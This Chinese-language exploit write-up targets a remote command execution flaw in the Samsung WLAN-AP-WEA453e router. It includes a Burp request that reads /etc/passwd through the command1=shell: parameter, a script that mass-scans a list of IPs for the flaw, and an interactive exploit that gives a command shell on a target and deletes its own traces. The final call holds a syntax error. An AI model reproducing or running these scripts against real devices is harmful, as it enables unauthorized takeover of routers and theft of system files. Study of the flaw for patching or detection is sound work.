| 漏洞名称 | 上报日期 | 漏洞发现者 | 产品首页 | 软件链接 | 版本 | CVE编号 |
|---|---|---|---|---|---|---|
| WLAN-AP-WEA453e RCE三星路由器远程命令执行漏洞 | 2020-8 | 未知 | https://www.Samsung.com | 三星WLAN-AP-WEA453e路由器 |
路由器首页
利用burp构造特殊的请求
POST /(download)/tmp/a.txt HTTP/1.1
Host: xxx.xxx.xxx.xxx
command1=shell:cat /etc/passwd| dd of=/tmp/a.txt
#filename: Check.py
#Usage: python3 Check.py ip.txt
import requests
import sys
import datetime
def CheckVuln(host):
vurl = host+'/(download)/tmp/a.txt'
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','Connection': 'close'}
data = {'command1':'shell:ls|dd of=/tmp/a.txt'}
try:
req = requests.post(url=vurl,data=data,verify=False,headers=headers,timeout=1)
if req.status_code ==200 and 'root' in req.text:
T = ('[*]-'+host+'-----Vulnerable!')
print(T)
OutPut(T)
else:
T = ('[-]-'+host+'-----Not Vulnnerable')
print(T)
OutPut(T)
except:
T = host+'[-]-----Network Error'
print(T)
OutPut(T)
def OutPut(F):
time = datetime.datetime.now().strftime('%Y-%m-%d')
#print(time)
f = open(time+'.txt','a')
f.write(F + '\n')
f.close()
def GetUrl(path):
with open(path,'r',encoding='utf-8') as f:
for i in f:
if i.strip() != '':
oldh = i.strip()
#print(oldh)
host = 'http://'+oldh
CheckVuln(host)
else:
print(path+'Empty File')
if len(sys.argv) != 2:
print('-------------Usage:python3 Check.py ip.txt----------------- ')
sys.exit()
path = sys.argv[1]
GetUrl(path)#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import sys
import os
from urllib3.exceptions import InsecureRequestWarning
class exp:
def Checking(self):
try:
Url = self.target + "(download)/tmp/hello.txt"
CkData = "command1=shell:cat /etc/passwd| dd of=/tmp/hello.txt"
response = requests.post(url = Url,data = CkData,verify = False,timeout = 20)
if(response.status_code == 200 and 'root:' in response.text):
return True
else:
return False
except Exception as e:
#print("checking")
print("[-] Server Error!")
def Exploit(self):
Url = self.target + "(download)/tmp/hello.txt"
while True:
try:
command = input("# ")
if(command == 'exit'):
self.Clean()
sys.exit()
if(command == 'cls'):
os.system("cls")
continue
data = "command1=shell:" + command + "| dd of=/tmp/hello.txt"
response = requests.post(url = Url,data = data,verify = False,timeout = 20)
if(response.text == None):
print("[!] Server reply nothing")
else:
print(response.text)
except KeyboardInterrupt:
self.Clean()
exit()
except Exception as e:
print("[-] Server not suport this command")
def Clean(self):
Url = self.target + "(download)/tmp/hello.txt"
try:
CleanData = "command1=shell:busybox rm -f /tmp/hello.txt"
response = requests.post(url = Url,data = CleanData,verify = False,timeout = 10)
if(response.status_code == 200):
print("[+] Clean target successfully!")
sys.exit()
else:
print("[-] Clean Failed!")
except Exception as e:
print("[-] Server error!")
def __init__(self,target,port):
self.target=target
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
if(len(sys.argv) == 3):
module = sys.argv[2]
if(module == 'clean'):
self.Clean()
else:
print("[-] module error!")
while self.Checking() is True:
self.Exploit()
exp(192.168.10.1,80)